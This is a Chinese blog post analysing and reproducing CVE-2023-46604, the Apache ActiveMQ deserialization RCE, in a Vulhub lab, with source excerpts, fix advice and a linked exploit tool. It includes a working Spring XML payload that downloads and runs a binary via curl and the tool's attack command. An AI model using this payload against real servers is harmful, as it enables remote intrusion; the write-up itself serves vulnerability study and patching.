CVE-2023-46604源码分析与漏洞复现

已于 2025-05-19 13:58:02 修改
阅读量1.1k 收藏 8
点赞数 30
CC 4.0 BY-SA版权
分类专栏: Vulhub靶场 文章标签: activemq java 网络安全
于 2025-04-18 21:03:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80022567/article/details/147339618

1. 漏洞概述

     漏洞编号:CVE-2023-46604
     漏洞类型:远程代码执行(RCE)
     CVSS评分:10.0(Critical)
     影响组件:Apache ActiveMQ OpenWire协议处理模块
     漏洞成因:

  • 反序列化类加载漏洞:攻击者通过构造恶意序列化数据,注入危险类名(如org.springframework.context.support.ClassPathXmlApplicationContext),触发远程XML配置文件加载,最终执行任意命令。

  • tightUnmarshalString 方法缺陷:未对反序列化字符串进行严格校验,可能被利用注入恶意类名或路径。

2. 影响版本

      受影响版本:

      Apache ActiveMQ < 5.15.16

      5.16.x < 5.16.7

      5.17.x < 5.17.6

      5.18.x < 5.18.3

      安全版本:

      ≥5.15.16、≥5.16.7、≥5.17.6、≥5.18.3

3. 源码分析

3.1 核心漏洞点:createThrowable()

private Throwable createThrowable(String className, String message) {
    try {
        // 直接加载攻击者控制的类名
        Class<?> clazz = Class.forName(className, false, getClassLoader());
        Constructor<?> constructor = clazz.getConstructor(String.class);
        return (Throwable) constructor.newInstance(message);
    } catch (Throwable e) {
        return new Throwable(className + ": " + message);
    }
}

漏洞说明

className 完全由攻击者控制,可注入危险类(如Spring的ClassPathXmlApplicationContext)。message 可指定远程XML URL(如http://attacker.com/malicious.xml),触发恶意Bean实例化。

3.2反序列化入口:tightUnmarshal()

public Object tightUnmarshal(OpenWireFormat wireFormat, DataInput dataIn) throws IOException {
    String className = dataIn.readUTF(); // 从数据流读取类名
    Class<?> clazz = Class.forName(className); // 直接加载类
    return clazz.newInstance();
}

3.3 漏洞触发链

  1. 构造恶意序列化数据

    • 注入className=org.springframework.context.support.ClassPathXmlApplicationContext

    • 注入message=http://attacker.com/malicious.xml

  2. 触发tightUnmarshalString加载恶意参数

    String clazz = tightUnmarshalString(dataIn, bs); // 类名:攻击者控制
String message = tightUnmarshalString(dataIn, bs); // 消息:远程XML URL
Throwable o = createThrowable(clazz, message); // 加载远程XML

  3. 远程XML执行命令

    <bean class="java.lang.ProcessBuilder">
  <constructor-arg>
    <list><value>bash</value><value>-c</value><value>恶意命令</value></list>
  </constructor-arg>
</bean>

    4. 漏洞复现(PoC)

环境搭建(vul)

攻击步骤

(1).管理员登录(账号admin,密码admin)

(2).exp工具下载

https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

(3)在exp工具目录开启http服务

python3 -m http.server 8001

(3).修改poc.xml文件(我的靶场环境是linux,所以用poc-linux.xml)

可以在工具目录自己创建test.elf文件

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>sh</value>
            <value>-c</value>
            <!-- The command below downloads the file and saves it as test.elf -->
            <value>curl -s -o test.elf http://192.168.1.1:8001/test.elf; chmod +x ./test.elf; ./test.elf</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

(4).运行exp工具 

activemq-rce -i 192.168.1.100 -u http://192.168.1.1:8001/poc-linux.xml

(5).验证(进入靶场容器) 

docker exec -it 容器id  /bin/bash

发现生成test.elf文件

5. 修复建议

官方补丁

类名白名单
仅允许反序列化ActiveMQ内部安全类(如org.apache.activemq.command.*)。

private static final Set<String> ALLOWED_CLASSES = Set.of(
    "org.apache.activemq.command.*",
    "java.lang.Throwable"
);

    6. 总结

    • 漏洞根源:

      • 反序列化过程中未校验类名,结合tightUnmarshalString方法的字符串解析缺陷,形成完整攻击链。

    • tightUnmarshalString 问题:

      • 长度未限制、编码不严谨,可能被用于构造超长字符串或畸形数据触发DoS。

    • 修复关键:

      • 类名白名单 + 输入严格校验。

    Apache ActiveMQ RCE漏洞复现CVE-2023-46604
    0xSec
    10-26 9166
    ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。
    [ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
    qq_51577576的博客
    03-12 2470
    [ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
    CVE-2023-46604 Apache ActiveMQ RCE漏洞
    mirocky的博客
    12-21 3485
    Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。
    【Apache ActiveMQ 远程代码执行漏洞复现(CVE-2023-46604)】
    2401_84968269的博客
    05-13 1131
    近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞,故做一下漏洞复现记录。
    红队攻防实践:15大漏洞原理复现全解析
    2402_86373248的博客
    05-23 692
    通过掌握上述漏洞原理复现方法,可系统性提升攻防能力。实际场景中需遵循合法授权原则,避免法律风险。:信息收集是渗透测试的第一步,目标是尽可能多地获取目标系统的暴露面信息。:资源竞争条件下,多个请求同时修改共享数据导致逻辑错误。:强制复杂密码、多因素认证(MFA)、账户锁定机制。)模拟并发请求,观察业务逻辑是否异常。使用Python多线程或工具(如。)或字典中的常见密码进行爆破。:利用默认密码、简单组合(如。(AWS渗透框架)。
    CVE-2023-46604- RCE漏洞复现
    2301_80115097的博客
    11-16 4721
    执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
    CVE-2023-46604 AMQ RCE漏洞
    zkaqlaoniao的博客
    11-24 1190
    执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
    CVE-2023-46604漏洞复现
    m0_66912330的博客
    12-24 2019
    Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。OpenWire协议在ActiveMQ中被用于多语言客户端服务端通信。在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。影响版本。
    ActiveMQ反序列化RCE漏洞复现CVE-2023-46604
    柠檬i的博客
    01-13 6778
    在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。首先,启动一个HTTP反连服务器,其中包含我们的。修改xml文件为反弹shell命令。
    ActiveMQ 反序列化RCE漏洞CVE-2023-46604
    zneVue
    07-17 1688
    在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。
    CVE-2023-33246 Apache RocketMQ 命令注入漏洞复现及分析
    热门推荐
    牛叫兽的测试学习和分享
    06-02 1万+
    CVE-2023-33246 漏洞复现及分析
    CVE-2023-4427:Out-of-bounds access in ReduceJSLoadPropertyWithEnumeratedKey
    qq_61670993的博客
    03-30 1414
    enum_cache bug
    漏洞复现CVE-2023-22809 sudo提权漏洞
    hack0919的博客
    05-20 1723
    漏洞等级:高危
    若依4.6 SQL注入代码审计(CVE-2023-49371)
    最新发布
    m0_50125527的博客
    06-08 485
    本文档所述漏洞详情及复现方法仅限用于合法授权的安全研究和学术教育用途。任何个人或组织不得利用本文内容从事未经许可的或其他违法行为。使用者应确保其行为符合相关法律法规,并取得目标系统的明确授权。对于因不当使用本文信息而造成的任何直接或间接后果,作者概不负责。若您发现本文内容涉及侵权或不当信息,请及时联系我们,我们将立即核实并采取必要措施。
    CVE-2023-46604复现学习
    shierbai的博客
    05-19 1205
    Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端服务端通信。
    安全科班大四学生渗透学习DAY 反序列化RCE CVE-2023-46604
    m0_65832989的博客
    01-25 483
    CVE-2023-46604 是一个影响 Apache ActiveMQ 的高危反序列化远程代码执行(RCE)漏洞,攻击者可以通过 OpenWire 协议向目标服务器发送恶意序列化数据,触发服务器加载并执行恶意 XML 配置文件,从而实现远程代码执行。攻击者可以通过构造恶意序列化数据,触发目标服务器加载并执行恶意 XML 文件。OpenWire 是 ActiveMQ 的默认协议,用于客户端服务器之间的通信。,传入的三个参数分别是目标服务器地址、端口,以及包含poc.xml的反连平台URL。
    Apache ActiveMQ (版本 < 5.18.3) (CVE-2023-46604)RCE修复方案/缓解方案
    士心的博客
    10-31 4285
    CVE-2023-46604
    [CVE-2023-44604]:Apache ActiveMQ OpenWire 协议远程代码执行漏洞
    摔不死的笨鸟的博客
    12-18 547
    Apache ActiveMQ OpenWire 协议远程代码执行漏洞
    CVE-2023-46604
    01-09
    ### 关于CVE-2023-46604安全漏洞的信息 对于特定的CVE编号,如CVE-2023-46604,通常可以通过官方渠道获取最权威的消息。然而,在提供的参考资料中并未直接提及该CVE编号的具体细节。 #### 漏洞详情 一般而言,针对某个具体的CVE编号所代表的安全漏洞,其详情会由发现者或受影响软件/系统的维护团队公布。这些信息可能包括但不限于漏洞的工作原理、触发条件以及潜在影响等。对于CVE-2023-46604来说,建议查阅国家信息安全漏洞库(CNNVD)、美国国家漏洞数据库(NVD)或其他可信来源发布的公告来获得最新且详尽的情况说明[^1]。 #### 影响范围 由于缺乏具体关于CVE-2023-46604的影响版本列表,无法给出确切的影响范围。但是,按照惯例,这类高危级别的漏洞往往会影响多个版本的产品直到发布补丁为止。因此,如果担心此漏洞对自己使用的系统构成威胁,则应尽快联系供应商了解具体情况并采取适当措施保护自己的资产安全[^2]。 #### 解决方案 面对尚未明确描述的CVE-2023-46604漏洞,最佳实践是遵循通用的安全更新流程: - 定期检查厂商网站上的安全公告; - 及时安装来自制造商的安全修补程序; - 对现有环境实施最小权限原则以减少攻击面; - 使用防火墙和其他网络安全工具监控异常活动。 此外,还可以考虑订阅相关行业的安全资讯服务以便第一时间掌握新出现的风险提示和应对策略[^3]。
    评论
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包

    打赏作者

    网安spinage

    你的鼓励将是我创作的最大动力

    ¥1 ¥2 ¥4 ¥6 ¥10 ¥20
    扫码支付:¥1
    获取中
    扫码支付

    您的余额不足,请更换扫码支付或充值

    打赏作者

    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值